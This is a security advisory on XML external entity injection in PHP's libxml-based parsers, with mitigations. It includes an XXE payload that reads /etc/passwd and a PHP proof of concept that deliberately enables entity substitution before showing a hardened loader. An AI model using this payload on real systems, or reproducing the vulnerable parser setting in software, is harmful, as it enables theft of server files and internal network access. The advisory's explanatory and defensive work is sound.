Vulnerability description: Extensible Markup Language (XML) is a markup language that gives electronic documents a structured form. It can be used both to mark up data and to define data types, and it is a meta-language that lets you define markup languages of your own. XML is a subset of the Standard Generalized Markup Language (SGML), is well suited to transmission over the Web, and provides a uniform, application- and vendor-independent way to describe and exchange structured data. 80sec found that a long-known XML external entity injection vulnerability is present in several common XML application scenarios. It can cause serious security problems: an attacker can read resources on the server and reach any resource on the network where the application is located.
Vulnerability Analysis: XML, as a widely used data transmission format, allows a document to reference external resources and pull them into the document. For example:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE copyright [
<!ELEMENT copyright (#PCDATA)>
<!ENTITY hi80sec SYSTEM "http://www.wooyun.org/">
]>
<Wooyun version="2.0">
<Whitehats>
&hi80sec; is a legend
</Whitehats>
</Wooyun>
This makes the XML parser fetch the external resource www.wooyun.org and substitute it for the hi80sec entity in the current document, so that data fetched from a location of the attacker's choosing flows into the application's own processing logic. In the same way, a system identifier such as
file:///etc/passwd
or
file://localhost/etc/passwd
lets the attacker read the local file system, and other URL schemes the parser supports (http:// among them) let the attacker reach hosts on the application's internal network.
Different parsers handle external entities differently by default. Taking PHP as an example, the two usual ways of processing XML are
xml_parse
and
simplexml_load_string / simplexml_load_file
and the two are built on different underlying libraries: the xml_parse family exposes the expat API, while SimpleXML uses libxml, and the two libraries treat entities differently during parsing. expat does not resolve external entities by default, while libxml did, so simplexml_load_*, DOM, and the other libxml-based functions are affected by this problem, while xml_parse is not affected in its default configuration. (This describes the defaults of the versions current when the advisory was written. With libxml2 2.9.0 and later, and PHP 8.0 and later, external entities are not substituted unless the caller passes the LIBXML_NOENT option; code that passes that option is still exposed.)
This problem is not limited to PHP: it also exists in the XML components and functions of other languages such as Java and Python, and it has been found in the systems of several Internet companies and in some widely used open-source software.
Proof of vulnerability: the confirmed vulnerabilities will be submitted through the WooYun vulnerability reporting platform.
Solution: check which underlying XML parsing library the application uses and configure it so that external entity resolution is disabled by default (in PHP, never pass LIBXML_NOENT to the libxml-based functions, and on versions before 8.0 call libxml_disable_entity_loader(true) before parsing untrusted input); strengthen monitoring of the system so that attempts to exploit this problem are noticed. Potentially affected products will be published on the WooYun vulnerability reporting platform.
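As an added example, not code from the 80sec advisory, the following PHP script reproduces the difference between the libxml-based simplexml_load_string() and the expat-style xml_parse() described in the analysis above, and then shows the kind of hardened loader the solution calls for. It assumes a Unix host where /etc/passwd is readable; the payload, the element names and the helper load_xml_safely() are constructed for this illustration. On PHP 8 / libxml2 2.9 and later, external entities are substituted only when the caller passes LIBXML_NOENT, so that option is set deliberately on the vulnerable call to reproduce the issue on a current interpreter.

```php
<?php
// Added example for this advisory, not 80sec's code. Reproduces the
// libxml (SimpleXML) vs expat-style (xml_parse) difference and shows a
// hardened loader. Assumes a Unix host where /etc/passwd is readable.

// Constructed payload: the external entity's body is the local password file.
$payload = <<<'XML'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE wooyun [
  <!ENTITY hi80sec SYSTEM "file:///etc/passwd">
]>
<wooyun version="2.0">
  <whitehats>&hi80sec;</whitehats>
</wooyun>
XML;

// 1. libxml path. Older PHP/libxml2 substituted external entities by
//    default; PHP 8 / libxml2 >= 2.9 only do so when LIBXML_NOENT is
//    passed, so it is passed here on purpose. The file contents end up
//    as the text of <whitehats>.
$vulnerable = simplexml_load_string($payload, 'SimpleXMLElement', LIBXML_NOENT);
$leaked = $vulnerable === false ? '' : (string) $vulnerable->whitehats;
echo "simplexml_load_string leaked /etc/passwd: ",
     var_export(strpos($leaked, 'root:') !== false, true), "\n";

// 2. expat-style path. xml_parse() does not fetch the entity body; the
//    reference is only reported to an optional external-entity-reference
//    handler, which is not installed here, so no file data reaches the
//    character-data handler.
$chars  = '';
$parser = xml_parser_create();
xml_set_character_data_handler($parser, function ($p, $data) use (&$chars) {
    $chars .= $data;
});
xml_parse($parser, $payload, true);
xml_parser_free($parser);
echo "xml_parse leaked /etc/passwd: ",
     var_export(strpos($chars, 'root:') !== false, true), "\n";

// 3. Hardened libxml loader (hypothetical helper for this example):
//    reject any DTD up front, never pass LIBXML_NOENT, forbid network
//    access with LIBXML_NONET, and on PHP < 8 switch the entity loader
//    off explicitly.
function load_xml_safely(string $xml): SimpleXMLElement
{
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        throw new InvalidArgumentException('DOCTYPE is not allowed');
    }
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $previous = libxml_use_internal_errors(true);
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
    libxml_use_internal_errors($previous);
    if ($doc === false) {
        throw new InvalidArgumentException('malformed XML');
    }
    return $doc;
}

try {
    load_xml_safely($payload);
} catch (InvalidArgumentException $e) {
    echo "load_xml_safely rejected the payload: ", $e->getMessage(), "\n";
}
```

The DOCTYPE string check in load_xml_safely() is only a belt-and-braces layer: it can be sidestepped if the input arrives in an encoding the regular expression does not see (UTF-16, for instance), so the parser options, not the pre-check, are the real control. Omitting LIBXML_NOENT keeps libxml from substituting entities on current versions, and the entity-loader switch covers older PHP where substitution was the default.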